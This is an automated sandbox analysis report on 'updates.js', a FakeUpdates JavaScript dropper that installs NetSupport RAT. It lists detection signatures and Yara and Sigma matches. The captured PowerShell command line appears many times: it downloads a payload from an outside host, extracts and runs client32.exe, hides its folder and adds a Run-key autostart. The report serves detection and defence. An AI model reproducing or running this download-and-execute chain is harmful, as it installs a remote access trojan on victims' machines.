Windows Analysis Report
updates.js

Overview

General Information

Sample name: updates.js
Analysis ID: 1475034
MD5: 917ed9cb792f81537e24395e1505bf6c
SHA1: 25fec4cba71614d8332cac3f4446fca039d1f33e
SHA256: d62447548f057c993c73fece105a22d98d2e2604e4f0cd26bb6821b2686e732f
Tags: FAKEUPDATES, js, NetSupportRAT
Infos:

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Snort IDS alert for network traffic
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5972 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 892 cmdline: "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 1772 cmdline: "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 1848 cmdline: "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
updates.js | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (listed below)
  • 0x6dc632:$b1: ::WriteAllBytes(
  • 0x6dc512:$b2: ::FromBase64String(
  • 0x12a0b:$s3: reverse
  • 0x12af2:$s3: reverse
  • 0x3a5e3:$s3: reverse
  • 0x3a680:$s3: reverse
  • 0x3b449:$s3: reverse
  • 0x3b771:$s3: reverse
  • 0x3b8ea:$s3: reverse
  • 0x3b985:$s3: reverse
  • 0x3bdb1:$s3: reverse
  • 0x3be00:$s3: reverse
  • 0x3be1b:$s3: reverse
  • 0x3bf09:$s3: reverse
  • 0x3c413:$s3: reverse
  • 0x3c41d:$s3: reverse
  • 0xce0be:$s3: reverse
  • 0xd19a1:$s3: reverse
  • 0x123747:$s3: reverse
  • 0x123792:$s3: reverse
  • 0x16cda9:$s3: reverse

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.3402960435.0000000003482000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000006.00000002.2327778463.0000000001168000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
4.2.client32.exe.74ad0000.6.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
6.2.client32.exe.74ad0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
7.0.client32.exe.f70000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
7.2.client32.exe.f70000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
7.2.client32.exe.74ad0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

System Summary

                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else 
{Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType 
Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 5972, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BTGEEENA
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { 
Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = c4c2d99d-dce2-4c63-9b01-d2d05392ab2f Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; Engine Version = 5.1.19041.1682 Runspace ID = 3b0870e3-db3b-4747-a157-04326a65c331 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = c4c2d99d-dce2-4c63-9b01-d2d05392ab2f Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass 
-NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemPrope
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path 
$CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if
                                Source: Process started Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 5972, ProcessName: wscript.exe
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A 